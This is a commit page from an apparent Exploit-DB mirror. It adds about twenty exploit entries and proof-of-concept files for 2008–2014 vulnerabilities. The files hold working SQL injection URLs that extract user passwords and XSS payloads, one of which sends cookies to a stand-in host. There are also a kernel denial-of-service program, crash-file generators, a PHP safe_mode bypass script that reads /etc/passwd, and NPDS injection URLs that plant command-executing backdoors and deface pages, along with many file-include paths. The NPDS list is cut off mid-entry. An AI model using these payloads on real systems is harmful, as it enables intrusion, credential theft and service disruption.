bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 04_05_2014

Browse source
This commit is contained in:
Offensive Security 2014-04-05 04:32:30 +00:00
parent d39d09c4d0
commit 1375f95446
24 changed files with 898 additions and 54 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

23
files.csv
View file

@ -29420,7 +29420,6 @@ id,file,description,date,author,platform,type,port
32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 Multiple SQL Injection Vulnerabilities",2008-12-01,"security curmudgeon",php,webapps,0
32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0
32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary 'cat' Parameter SQL Injection Vulnerability",2008-12-13,Pouya_Server,asp,webapps,0
32659,platforms/hardware/webapps/32659.txt,"ICOMM 610 Wireless Modem - CSRF Vulnerability",2014-04-02,"Blessen Thomas",hardware,webapps,0
32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0
32661,platforms/windows/remote/32661.html,"Evans FTP 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0
32662,platforms/php/webapps/32662.py,"WebPhotoPro Multiple SQL Injection Vulnerabilities",2008-12-14,baltazar,php,webapps,0
@ -29436,3 +29435,25 @@ id,file,description,date,author,platform,type,port
32673,platforms/multiple/remote/32673.java,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",multiple,remote,0
32674,platforms/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",multiple,remote,0
32675,platforms/linux/dos/32675.py,"QEMU 0.9 and KVM 36/79 VNC Server Remote Denial of Service Vulnerability",2008-12-22,"Alfredo Ortega",linux,dos,0
32676,platforms/php/webapps/32676.txt,"PECL Alternative PHP Cache Local 3 HTML Injection Vulnerability",2008-12-19,"Moritz Naumann",php,webapps,0
32677,platforms/jsp/webapps/32677.txt,"Openfire <= 3.6.2 'group-summary.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0
32678,platforms/jsp/webapps/32678.txt,"Openfire <= 3.6.2 'user-properties.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0
32679,platforms/jsp/webapps/32679.txt,"Openfire <= 3.6.2 'log.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0
32680,platforms/jsp/webapps/32680.txt,"Openfire 3.6.2 'log.jsp' Directory Traversal Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0
32681,platforms/hardware/remote/32681.txt,"COMTREND CT-536 and HG-536 Routers Multiple Remote Vulnerabilities",2008-12-22,"Daniel Fernandez Bleda",hardware,remote,0
32682,platforms/linux/dos/32682.c,"Linux Kernel 2.6.x 'qdisc_run()' Local Denial of Service Vulnerability",2008-12-23,"Herbert Xu",linux,dos,0
32683,platforms/asp/webapps/32683.txt,"Mavi Emlak 'newDetail.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0
32684,platforms/windows/remote/32684.c,"Microsoft Windows Media Player 9/10/11 WAV File Parsing Code Execution Vulnerability",2008-12-29,anonymous,windows,remote,0
32685,platforms/php/webapps/32685.txt,"ViArt Shop 3.5 manuals_search.php manuals_search Parameter XSS",2008-12-29,"Xia Shing Zee",php,webapps,0
32686,platforms/multiple/remote/32686.xml,"MagpieRSS 0.72 CDATA HTML Injection Vulnerability",2008-12-29,system_meltdown,multiple,remote,0
32687,platforms/asp/webapps/32687.txt,"Madrese-Portal 'haber.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0
32688,platforms/windows/remote/32688.py,"Winace 2.2 Malformed Filename Remote Denial of Service Vulnerability",2008-12-29,cN4phux,windows,remote,0
32689,platforms/php/webapps/32689.txt,"NPDS Versions Prior to 08.06 Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0
32690,platforms/linux/remote/32690.txt,"xterm DECRQSS Remote Command Execution Vulnerability",2008-12-29,"Paul Szabo",linux,remote,0
32692,platforms/hardware/dos/32692.txt,"Symbian S60 Malformed SMS/MMS Remote Denial Of Service Vulnerability",2008-12-30,"Tobias Engel",hardware,dos,0
32693,platforms/php/local/32693.php,"suPHP <= 0.7 'suPHP_ConfigPath' Safe Mode Restriction-Bypass Vulnerability",2008-12-31,Mr.SaFa7,php,local,0
32694,platforms/osx/dos/32694.pl,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (1)",2009-01-01,"Jeremy Brown",osx,dos,0
32695,platforms/osx/dos/32695.php,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (2)",2009-01-01,Pr0T3cT10n,osx,dos,0
32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 Multiple Cross-Site Scripting and Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0
32697,platforms/linux/dos/32697.pl,"aMSN '.ctt' File Remote Denial of Service Vulnerability",2009-01-03,Hakxer,linux,dos,0
32698,platforms/php/webapps/32698.txt,"SolucionXpressPro 'main.php' SQL Injection Vulnerability",2009-01-05,Ehsan_Hp200,php,webapps,0

Can't render this file because it is too large.

7
platforms/asp/webapps/32683.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33041/info
Mavi Emlak is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/newDetail.asp?haberNo=-9999%20union%20select%200,username,password,3,4,5%20from%20Danismanlar

9
platforms/asp/webapps/32687.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33045/info
Madrese-Portal is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[path]/haber.asp?haber=-999'%20union%20select%200,1,ad,3,4%20from%20Kullanici%20where%20'1
http://www.example.com/[path]/haber.asp?haber=-999'%20union%20select%200,1,sifre,3,4%20from%20Kullanici%20where%20'1

12
platforms/hardware/dos/32692.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/33072/info
Symbian S60 is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to prevent users from sending or receiving SMS or MMS messages.
This issue affects handsets using Symbian S60.
The following example message is available:
"123456789@123456789.1234567890123 "

17
platforms/hardware/remote/32681.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/32975/info
COMTREND CT-536 and HG-536 are prone to multiple remote vulnerabilities:
- Multiple unauthorized-access vulnerabilities
- An information-disclosure vulnerability
- Multiple cross-site scripting vulnerabilities
- A denial-of-service vulnerability
- Multiple buffer-overflow vulnerabilities
Attackers can exploit these issues to compromise the affected device, obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and cause a denial-of-service condition. Other attacks are also possible.
The following firmware versions are vulnerable; additional versions may also be affected:
CT-536 A101-302JAZ-C01_R05
HG-536+ A101-302JAZ-C01_R05 and A101-302JAZ-C03_R14.A2pB021g.d15h
http://www.example.com/scvrtsrv.cmd?action=add&srvName=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd http://www,example.com/password.html

53
platforms/hardware/webapps/32659.txt
View file

@ -1,53 +0,0 @@
Exploit Title : ICOMM 610 Wireless Modem CSRF Vulnerability
Google dork : N/A
Date : 02/04/2014
Exploit Author : Blessen Thomas
Vendor Homepage : http://www.icommtele.com/
Software Link : N/A
Version : ICOMM 610
Tested on : Device software version 01.01.08.991 (10/01/2010)
Type of Application : Modem Web Application
CVE : N/A
Cross Site Request Forgery
It was observed that this modem's Web Application , suffers from Cross-site
request forgery through which attacker can manipulate user data via sending
him malicious craft url.
At attacker could change the password of the victim's account without the
victim's knowledge as the
application is not having a security token implemented.
The Modem's application is not using any security token to prevent it
against CSRF. You can manipulate any userdata. PoC and Exploit to change
user password: In the POC the IP address in the POST is the modems IP
address.
<html>
<!-- CSRF PoC --->
<body>
<form action="http://192.168.1.1/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">
<input type="hidden" name="PasswdEnable" value="on" />
<input type="hidden" name="New_Passwd" value="test" />
<input type="hidden" name="Confirm_New_Passwd" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

9
platforms/jsp/webapps/32677.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32937/info
Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Openfire 3.6.2 is vulnerable; prior versions may also be affected.
http://www.example.com/group-summary.jsp?search=%22%3E%3C[xss]

9
platforms/jsp/webapps/32678.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32938/info
Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Openfire 3.6.2 is vulnerable; prior versions may also be affected.
http://www.example.com/user-properties.jsp?username=%3C[xss]

9
platforms/jsp/webapps/32679.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32940/info
Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Openfire 3.6.2 is vulnerable; prior versions may also be affected.
http://www.example.com/log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27[xss]

9
platforms/jsp/webapps/32680.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32945/info
Openfire is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
Openfire 3.6.2 is vulnerable; prior versions may also be affected.
http://www.example.com/log.jsp?log=..\..\..\windows\debug\netsetup

64
platforms/linux/dos/32682.c Executable file
View file

@ -0,0 +1,64 @@
source: http://www.securityfocus.com/bid/32985/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Local attackers can exploit this issue to cause a soft lockup, denying service to legitimate users.
Versions prior to Linux kernel 2.6.25 are vulnerable.
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#define MAXTASKS 200
int main(int argc, char *argv[])
{
int i;
char cmd[128];
FILE *f;
pid_t pids[MAXTASKS];
pid_t pid;
unsigned int num;
if (argc < 3) {
printf("enter netserver hostname as the first parameter\n");
printf("enter number of netperf tasks as the second parameter\n");
return 1;
}
f = fopen("/dev/null", "w");
if (!f) {
printf("cannot open /dev/nu;;\n");
return 2;
}
sprintf(cmd, "netperf -H %s -l 60 -t UDP_STREAM -- -s 262144 -r 262144 -m 16384", argv[1]);
num = atoi(argv[2]);
if (num > MAXTASKS) {
printf("number of tasks is too high, resetting to %ld\n", MAXTASKS);
num = MAXTASKS;
}
for(i = 0; i < num; i++) {
pid = fork();
if (pid == 0) {
fclose(stdout);
fclose(stderr);
stdout = f;
stderr = f;
execl("/bin/sh", "/bin/sh", "-c", cmd, NULL);
}
else {
printf("newpid: %d\n", pid);
pids[i] = pid;
}
}
for(i = 0; i < num; i++) {
waitpid(pids[i], NULL, 0);
}
fclose(f);
return 0;
}

15
platforms/linux/dos/32696.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/33085/info
KDE Konqueror is prone to multiple cross-site scripting vulnerabilities and multiple denial-of-service vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, or cause the affected browser to crash.
KDE Konqueror 4.1 is vulnerable; other versions may also be affected.
applications:/<a href="javascript:alert(1)">Here</a>
trash:/<a href="javascript:alert(1)">Here</a>
remote:/<a href="javascript:alert(1)">Here</a>
applications:/<font size="8">THE GAME</font>
applications:/<iframe src="http://milw0rm.com">
remote://crash:konqueror@
applications://crash:konqueror@

55
platforms/linux/dos/32697.pl Executable file
View file

@ -0,0 +1,55 @@
source: http://www.securityfocus.com/bid/33096/info
aMSN is prone to a remote denial-of-service vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
Attackers can exploit this issue by enticing an unsuspecting victim to open a specially crafted '.ctt' file.
Successfully exploiting this issue will cause the application to crash, denying service to legitimate users. Attackers may also be able to run arbitrary code, but this has not been confirmed.
#!usr/bin/perl
#Description : download The Program and run the
PoC and go to aMSN messenger and go to Contacts / Load Contact List /
Choose Hakxer File
# The Program Get Disconnect from Server
# thx to allah [ Proud To Be A Muslim ]
# EgY Coders Vulnerability Researcher Team
print "************************************************************************
*** Discovered & Written By : Hakxer [Egy Coders Team]
*** Program / bug : aMSN [CTT File] Denial Of Service
*** program site : http://www.amsn-project.net/
*** Greetz to : Allah , EgY Coders Team , All My Friends
**************************************************************************"
my $code='<?xml version="1.0"?>
<messenger>
<service name=".NET Messenger Service">
<contactlist>
<contact>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</contact>
</contactlist>
</service>
</messenger>';
open (MYFILE,'>>hakxer.ctt');
print MYFILE $code;
close(MYFILE);

12
platforms/linux/remote/32690.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/33060/info
The 'xterm' program is prone to a remote command-execution vulnerability because it fails to sufficiently validate user input.
Successfully exploiting this issue would allow an attacker to execute arbitrary commands on an affected computer in the context of the affected application.
The issue affects xterm with patch 237; other versions may also be affected.
The following example is available:
perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log
cat bla.log

28
platforms/multiple/remote/32686.xml Executable file
View file

@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/33044/info
MagpieRSS is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
MagpieRSS 0.72 is vulnerable; other versions may also be affected.
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title><![CDATA["><iframe src="javascript:window.location=&#039;http://www.example.com/cookiez.php?c=&#039;+document.cookie"></iframe><a lol="]]></title>
<description>XSS test</description>
<item>
<title><![CDATA[z0mG?!]]></title>
<link><![CDATA[what teh hax?!]]></link>
<description>
<![CDATA[
"><iframe src="javascript:alert(/xss/)"></iframe>
]]>
</description>
</item>
</channel>
</rss>

39
platforms/osx/dos/32694.pl Executable file
View file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/33080/info
Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library.
Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition.
Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected.
Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable.
#!/usr/bin/perl
# safari_webkit_ml.pl
# Safari (Webkit) 3.2 Remote Memory Leak Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# Access violation when writing to [00000018]
# EIP 6B00A02B WebKit.6B00A02B
# LastError 00000008 ERROR_NOT_ENOUGH_MEMORY
# Memory leaks are common in browsers.. tested on Vista SP1
# Compliments of bf2
$filename = $ARGV[0];
if(!defined($filename))
{
print "Usage: $0 <filename.html>\n";
}
$head = "<html>" . "\n";
$trig = "<body alink=\"" . "A/" x 10000000 . "\">" . "\n";
$foot = "</html>";
$data = $head . $trig . $foot;
open(FILE, '>' . $filename);
print FILE $data;
close(FILE);
exit;

55
platforms/osx/dos/32695.php Executable file
View file

@ -0,0 +1,55 @@
source: http://www.securityfocus.com/bid/33080/info
Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library.
Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition.
Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected.
Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable.
<?php
# _ ____ __ __ ___
# (_)____ _ __/ __ \/ /_____ ____/ / _/_/ |
# / // __ \ | / / / / / //_/ _ \/ __ / / / / /
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/
# Live by the byte |_/_/
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
# The following code is a proof of concept for a crash vulnerability that exists in 'Apple iPhone MobileSafari'.
# Point your browser to the created(crash.html) file and see what happen ;)
# The vulnerable tag is:
# * <body alink="A x 12000085">
# -----------------------------------
# Exploit Title: Apple iPhone Safari (body alink) Remote Crash
# Date: 19/12/2010
# Author: Pr0T3cT10n
# Affected Version: IOS 4.0.1
# Tested on Apple iPhone 3, IOS 4.0.1 MobileSafari
# Launch Safari, point your browser to the page and safari will crash.
# ISRAEL, NULLBYTE.ORG.IL
$string = str_repeat('A', 12000085);
$code = "<html>
<head>
<title>Apple iPhone Safari (body alink) Remote Crash</title>
</head>
<body alink='{$string}'>
</body>
</html>";
if(file_put_contents("./crash.html", $code)) {
echo("Point your safari mobile browser to `crash.html`.\r\n");
} else {
echo("Cannot create file.\r\n");
}
?>

70
platforms/php/local/32693.php Executable file
View file

@ -0,0 +1,70 @@
source: http://www.securityfocus.com/bid/33073/info
suPHP is prone to a 'safe_mode' restriction-bypass vulnerability.
Successful exploits may allow attackers to bypass arbitrary PHP configuration options, including the 'safe_mode' setting.
This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code, with the 'safe_mode' restrictions assumed to isolate the users from each other.
<?
/*
apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit
Author : Mr.SaFa7
Home : v4-team.com
note : this exploit for education :)
*/
echo "[+] Start...\n";
$bypfile=fopen('php.ini','w+');
$stuffile=fopen('.htaccess','w+');
if($bypfile and $stuffile!= NULL){
echo "[+] evil files created succes ! \n";
}
else{
echo "[-] access denial ! \n";
}
$byprullz1="safe_mode = OFF
";
$byprullz2="disable_functions = NONE";
$dj=fwrite($bypfile,$byprullz1);
$dj1=fwrite($bypfile,$byprullz2);
fclose($bypfile);
if($dj and $dj1!= NULL){
echo "[+] php.ini writed \n";
}
else{
echo "[-] 404 php.ini not found !\n";
}
$breakrullz="suPHP_ConfigPath /home/user/public_html/php.ini"; // replace this '/home/user/public_html' by ur path
$sf7=fwrite($stuffile,$breakrullz);
fclose($stuffile);
if($sf7!= NULL){
echo "[+] evil .htaccess writed\n";
echo "[+] exploited by success!\n\n\n";
echo "\t\t\t[+] discouvred by Mr.SaFa7\n";
echo "\t\t\t[+] home : v4-team.com\n";
echo "\t\t\t[+] Greetz : djekmani4ever ghost hacker Str0ke ShAfEKo4EvEr Mr.Mn7oS\n";
}
else{
echo "[-] evil .htaccess Not found!\n";
}
system("pwd;ls -lia;uname -a;cat /etc/passwd");
#EOF
?>

15
platforms/php/webapps/32676.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/32934/info
PECL Alternative PHP Cache is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Alternative PHP Cache 3.1.1 and 3.0.19 are vulnerable; other versions may also be affected.
A malicious user with local write access (such as an FTP user on shared
hosting environments) may create two directories
</
a><script>alert("XSS")</
and create a file named
script>.php
in the latter directory, then access this file via HTTP.

14
platforms/php/webapps/32685.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/33043/info
ViArt Shop is prone to multiple remote vulnerabilities:
- Multiple cross-site scripting vulnerabilities
- An information-disclosure vulnerability
- An authentication-bypass vulnerability
An attacker can exploit these issues to execute arbitrary script code, steal cookie-based authentication credentials, obtain sensitive information, or gain unauthorized access to the affected application.
ViArt Shop 3.5 is vulnerable; other versions may also be affected.
http://www.example.com/manuals_search.php?manuals_search=<html><script>window.location="http://www.example2.com";</script></html>

304
platforms/php/webapps/32689.txt Executable file
View file

@ -0,0 +1,304 @@
source: http://www.securityfocus.com/bid/33051/info
NPDS is prone to multiple input-validation vulnerabilities:
- Multiple local file-include vulnerabilities
- An HTML-injection vulnerability
- Multiple SQL-injection vulnerabilities
- Multiple cross-site scripting vulnerabilities
Exploiting these issues can allow an attacker to steal cookie-based authentication credentials, view and execute arbitrary local files within the context of the webserver, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.
Versions prior to NPDS 08.06 are vulnerable.
http:/www.example.com/npds/modules/annonces/config.php?admin=1&tit=";%0Apassthru(stripslashes(urldecode($_GET[&#039;cmd&#039;])));%0Aecho%20"
/npds/modules/annonces/config.php
Create backdoor and/or inject code into connect.inc.php file
BACKDOOR PHP
http:/www.example.com/npds/modules/last-fm/admin/adm_save.php?ModPath=../../../../../test.php%00&lastfm_username=";%0Asystem($_GET[&#039;dir&#039;]);%0Aecho%20"
DEFACE
http:/www.example.com/npds/modules/last-fm/admin/adm_save.php?ModPath=../../../../../index.html%00&lastfm_username=";%0APHP?><html><big><big>OWNED%20BY%20NOSP
!!!</big></big></html><?php
/npds/modules/last-fm/admin/adm_save.php
Create backdoor and/or inject code into security.log file
<form name="fileU" method="post" enctype="multipart/form-data" action="http:/www.example.com/npds/modules/upload/upload.php">Fichier : <input
class="TEXTBOX_STANDARD" type="file" name="file1" size="50" maxlength="255">
<input class="TEXTBOX_STANDARD" type="submit" value="OK">
<input type="hidden" name="MAX_FILE_SIZE" value="200000">
<input type="hidden" name="op" value="upload">
<input type="hidden" name="numero" value="0">
<input type="hidden" name="ficname" value="test.txt">
<input type="hidden" name="name_tmp" value="<? phpinfo(); ?>">
</form>
/npds/modules/upload/upload.php
Create backdoor and/or inject code into security.log file
http:/www.example.com/npds/footer.php?Default_Theme=../logs\security.log%00
/npds/footer.php
Include
http:/www.example.com/npds/modules/annonces/affi_ann.php?ModPath=../../logs/security.log%00
/npds/modules/annonces/affi_ann.php
Include
http:/www.example.com/npds/modules/annonces/affi_img.php?ModPath=../../logs/security.log%00
/npds/modules/annonces/affi_img.php
Include
http:/www.example.com/npds/modules/affiche.php?ModPath=../../logs/security.log%00
/npds/modules/annonces/affiche.php
Include
http:/www.example.com/npds/modules/annul.php?ModPath=../../logs/security.log%00&
/npds/modules/annul.php
Include
http:/www.example.com//npds/modules/block_partenaires.php?language=../../../../../../logs/security.log%00
/npds/modules/block_partenaires.php
Include
http:/www.example.com/npds/modules/chargement.php?ModPath=../../logs/security.log%00
/npds/modules/chargement.php
Include
\
http:/www.example.com/npds/modules/deezer/admin/index.php?ModPath=../../../../logs/security.log%00 OU
http:/www.example.com/npds/modules/deezer/admin/index.php?language=../../../../../../logs/security.log%00
/npds/modules/deezer/admin/index.php
Include
http:/www.example.com/npds/modules/deezer/deezer.php?language=../../../../../logs/security.log%00
/npds/modules/deezer/deezer.php
Include
http:/www.example.com/npds/modules/deezer/deezermod.php?language=../../../../logs/security.log%00
/npds/modules/deezer/deezermod.php
Include
http:/www.example.com/npds/modules/G-annonces/admin/adm_ann.php?ModPath=../../../../../../logs/security.log%00
/npds/modules/G-annonces/admin/adm_ann.php
Include
http:/www.example.com/npds/modules/G-annonces/admin/?ModPath=../../../../../../logs/security.log%00
/npds/modules/G-annonces/admin/index.php
Include
http:/www.example.com/npds/modules/G-annonces/annonce_form.php?ModPath=../../../logs/security.log%00
/npds/modules/G-annonces/annonce_form.php
Include
http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../../../logs/security.log%00
/npds/modules/G-annonces/index.php
Include
http:/www.example.com/npds/modules/G-annonces/list_ann.php?ModPath=../../../../../logs/security.log%00
/npds/modules/G-annonces/list_ann.php
Include
http:/www.example.com/npds/modules/G-annonces/modif_ann.php?ModPath=../../../../../logs/security.log%00
/npds/modules/G-annonces/modif_ann.php
Include
http:/www.example.com/npds/modules/G-annonces/search.php?ModPath=../../../../../logs/security.log%00
/npds/modules/G-annonces/search.php
Include
http:/www.example.com/npds/modules/GS-annonces/print.php?ModPath=../../../logs/security.log%00
/npds/modules/GS-annonces/print.php
Include
http:/www.example.com/npds/modules/last-fm/admin/adm.php?ModPath=../../../../logs/security.log%00 OU
http:/www.example.com/npds/modules/last-fm/admin/adm.php?language=../../../../../logs/security.log%00
/npds/modules/last-fm/admin/adm.php
Include
http:/www.example.com/npds/modules/last-fm/admin/adm_save.php?ModPath=../../../../../logs/security.log%00
/npds/modules/last-fm/admin/adm_save.php
Include
http:/www.example.com/npds/modules/last-fm/error.php?ModPath=../../../../logs/security.log%00 ET
http:/www.example.com/npds/modules/last-fm/error.php?language=../../../../../logs/security.log%00
/npds/modules/last-fm/error.php
Include
http:/www.example.com/npds/modules/last-fm/last-fm.php?language=../../../../../../logs/security.log%00
/npds/modules/last-fm/last-fm.php
Include
http:/www.example.com/npds/modules/links/admin/create_tables.php?ModPath=../../../../logs/security.log%00/admin%00
/npds/modules/links/admin/create_tables.php
Include
http:/www.example.com/npds/modules/saisie.php?user=1&ModPath=../../logs/security.log%00
/npds/modules/saisie.php
Include
http:/www.example.com/npds/modules/td-galerie/admin/adm.php?ModPath=../../../.././logs/security.log%00
/npds/modules/td-galerie/admin/adm.php
Include
http:/www.example.com/npds/modules/td-glossaire/glossadmin.php?ModPath=../../../logs/security.log%00 OU
http:/www.example.com/npds/modules/td-glossaire/glossadmin.php?language=../../../../../logs/security.log%00
/npds/modules/td-glossaire/glossadmin.php
Include
http:/www.example.com/npds/modules/td-glossaire/glossaire.php?ModPath=../../../logs/security.log%00 OU
